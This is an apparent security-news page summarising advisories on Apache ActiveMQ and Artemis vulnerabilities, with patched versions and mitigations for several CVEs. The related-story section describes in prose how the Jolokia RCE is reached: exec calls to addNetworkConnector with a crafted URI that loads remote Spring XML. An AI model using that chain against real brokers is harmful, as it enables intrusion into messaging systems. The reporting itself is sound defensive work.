Apache ActiveMQ and Artemis Flaws Enable Security Bypass and Multiple Attacks
German authorities issued advisories for Apache ActiveMQ Artemis and Apache ActiveMQ Classic components after disclosing vulnerabilities that affect the broker, client, and web interfaces. One advisory warns that a flaw in Apache ActiveMQ Artemis can allow attackers to bypass security measures, raising the risk of unauthorized access or actions within affected messaging environments.
A separate advisory reports multiple vulnerabilities in Apache ActiveMQ across the Client, Broker, and Web components, indicating broader exposure for organizations using the messaging platform in enterprise integrations and application back ends. The notices identify the affected Apache messaging products as requiring prompt review and remediation to reduce the risk of compromise in systems that rely on ActiveMQ services.
Timeline
Apr 24, 2026
dCERT publishes advisory on multiple Apache ActiveMQ vulnerabilities
dCERT issued Advisory 2026-1234 for Apache ActiveMQ covering multiple vulnerabilities. It was published as a new security notice separate from the earlier Apache ActiveMQ advisories already recorded.
Apr 10, 2026
dCERT publishes advisory on multiple Apache ActiveMQ vulnerabilities
dCERT issued Advisory 2026-1018 for Apache ActiveMQ covering multiple vulnerabilities. The advisory was published as a new security notice separate from earlier Apache ActiveMQ advisories.
Apr 8, 2026
dCERT publishes advisory on multiple Apache ActiveMQ vulnerabilities
dCERT issued Advisory 2026-0972 covering multiple vulnerabilities affecting Apache ActiveMQ Client, Broker, and Web components.
Mar 23, 2026
dCERT publishes advisory on Apache ActiveMQ Artemis security bypass flaw
dCERT issued Advisory 2026-0799 for Apache ActiveMQ Artemis describing a vulnerability that allows bypassing security measures.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Organizations
Affected Products
Sources
Related Stories
Apache ActiveMQ Flaws Enable Path Traversal and TLS DoS
Apache disclosed two vulnerabilities affecting multiple **ActiveMQ** components, including Client, Broker, and bundled distributions. **CVE-2026-33227** is a low-severity pathname restriction flaw that lets an authenticated user manipulate a supplied `key` value to traverse the classpath in two cases: when creating a **STOMP** consumer and when browsing messages through the web console. Apache warned the issue could expose classpath resource loading and potentially be chained with another attack. The flaw affects the 5.x branch before **5.19.3** and the 6.x branch from **6.0.0** before **6.2.2**, but Apache said those initial fixes were incomplete on Windows because of path separator handling, and recommended upgrading instead to **5.19.4** or **6.2.3**. Apache also published **CVE-2026-39304**, an important denial-of-service flaw in ActiveMQ's **NIO SSL transports** caused by incorrect handling of **TLS 1.3 `KeyUpdate`** messages. A client can repeatedly trigger updates and exhaust broker memory in the SSL engine, causing out-of-memory crashes and service disruption. Apache added that related handshake handling is also broken for earlier TLS versions such as **TLS 1.2**, though those cases lead to hung connections rather than memory exhaustion. The DoS issue affects the 5.x branch before **5.19.4** and the 6.x branch from **6.0.0** before **6.2.4**; users are advised to upgrade to **5.19.5** or **6.2.4**.
3 weeks ago
Authentication Bypass in Apache Artemis Core Downstream Federation (CVE-2026-27446)
**CVE-2026-27446** is a critical *missing authentication for a critical function* (CWE-306) in **Apache Artemis** and **Apache ActiveMQ Artemis** that enables an unauthenticated remote attacker to abuse the **Core protocol** to force a target broker to establish an outbound Core downstream federation connection to an attacker-controlled rogue broker. If successful, the attacker can **inject arbitrary messages into any queue** and/or **exfiltrate messages from any queue** via the rogue broker, particularly in environments that allow **incoming Core protocol connections from untrusted sources** and **outgoing Core protocol connections to untrusted destinations**. Impacted versions include **Apache Artemis 2.50.0–2.51.0** and **Apache ActiveMQ Artemis 2.11.0–2.44.0**; upgrading to **Apache Artemis 2.52.0** is recommended to remediate. Mitigations include removing Core protocol support from untrusted-facing acceptors (notably the default `artemis` acceptor on port `61616` if configured to allow Core) or enforcing **two-way TLS (mTLS)** to require certificate-based client authentication before protocol negotiation. The Centre for Cybersecurity Belgium highlighted the high severity (reported as **CVSS 9.3**) and noted no vendor warning of active exploitation as of early March 2026, while emphasizing that **ActiveMQ-family products have been repeatedly targeted historically** for follow-on activity such as ransomware deployment.
1 months ago
Apache ActiveMQ Jolokia MBean Flaw Enables Authenticated RCE
Apache disclosed **CVE-2026-34197**, an important-severity remote code execution flaw in **Apache ActiveMQ Broker** and **Apache ActiveMQ Classic** that lets authenticated users execute code through the Jolokia JMX-HTTP bridge exposed at `/api/jolokia/`. The default Jolokia access policy permits `exec` operations on ActiveMQ MBeans, allowing attackers to call methods such as `BrokerService.addNetworkConnector(String)` and `BrokerService.addConnector(String)` with a crafted discovery URI. The exploit abuses the VM transport `brokerConfig` parameter to load a remote Spring XML application context via `ResourceXmlApplicationContext`, and Spring may instantiate singleton beans before ActiveMQ validates the configuration, enabling arbitrary code execution in the broker JVM, including through methods like `Runtime.exec()`. Apache said the issue affects versions before **5.19.4** in the 5.x line and **6.0.0 through before 6.2.3** in the 6.x line, and recommends upgrading to **5.19.5** or **6.2.3**; the vulnerability was reported by Naveen Sunkavally of Horizon3.ai.
1 weeks ago